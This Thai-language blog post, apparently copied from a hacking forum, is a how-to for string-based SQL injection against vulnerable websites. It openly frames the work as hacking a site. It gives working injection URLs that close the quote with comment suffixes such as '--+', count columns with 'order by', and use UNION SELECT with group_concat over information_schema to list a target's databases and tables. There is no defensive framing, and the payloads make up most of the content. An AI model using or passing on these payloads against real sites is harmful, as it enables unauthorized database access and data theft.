แก้ไขปัญหา เวลาพิมพ์คำสั่งลงไปบนเว็ปที่มีช่องโหว่แต่ไม่มีผลอะไรตอบกลับมา
ซึ่งวิธีนี้เป็นวิธีแก้ปัญหาพื้นฐาน ที่สามารถใช้ได้กับ Error Based SQL injection, Blind Injection ได้เหมือนกันครับ
String Based SQL injection
อะไรคือ String Based SQL injection? แล้วจะรู้ได้ยังไง
String Based SQL injection จะเกิดขึ้นเมื่อคุณกำลังทำการแฮกเว็ปไซด์ที่มีช่องโหว่แต่พอเราพิมพ์คำสั่งต่างๆไปแต่กลับไม่มีผลตอบรับกลับมา เช่น:
Code:
"order by" ไม่ทำงาน, เช่นคุณลองจนไปถึง: order by 100-- แต่ก็ยังไม่เจอ error ซึ่งที่จริงมันไม่น่าจะมีเกิน 100 คอลัมน์
"group by" ไม่ทำงาน
"having 1=2" ไม่ทำงาน
และอื่นๆวิธีแก้ปัญหานี้: ใช้คำสั่งตามนี้ครับ
Code:
http://www.??????.com/index.php?id=10' order by 1000--+
Code:
นอกจากนี้ยังใช้ตัวอื่นได้อีกเช่น:
+--+
+--
-- -+เช็คจำนวนคอลัมน์
Code:
http://www.??????.com/index.php?id=10' order by 10--+หาข้อมูลของเว็ปไซด์
Code:
http://www.??????.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+หา Table นั้นฐานข้อมูลของเว็ปไซด์
Code:
http://www.??????.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+-= สามารถใช้แก้ปัญหาของ Error Based SQL injection, Blind Based และ SQL injection ชนิดอื่นๆได้เหมือนกัน =-
เครดิส http://www.hackdee.com/Forums/showthread.php?tid=114
ไม่มีความคิดเห็น:
แสดงความคิดเห็น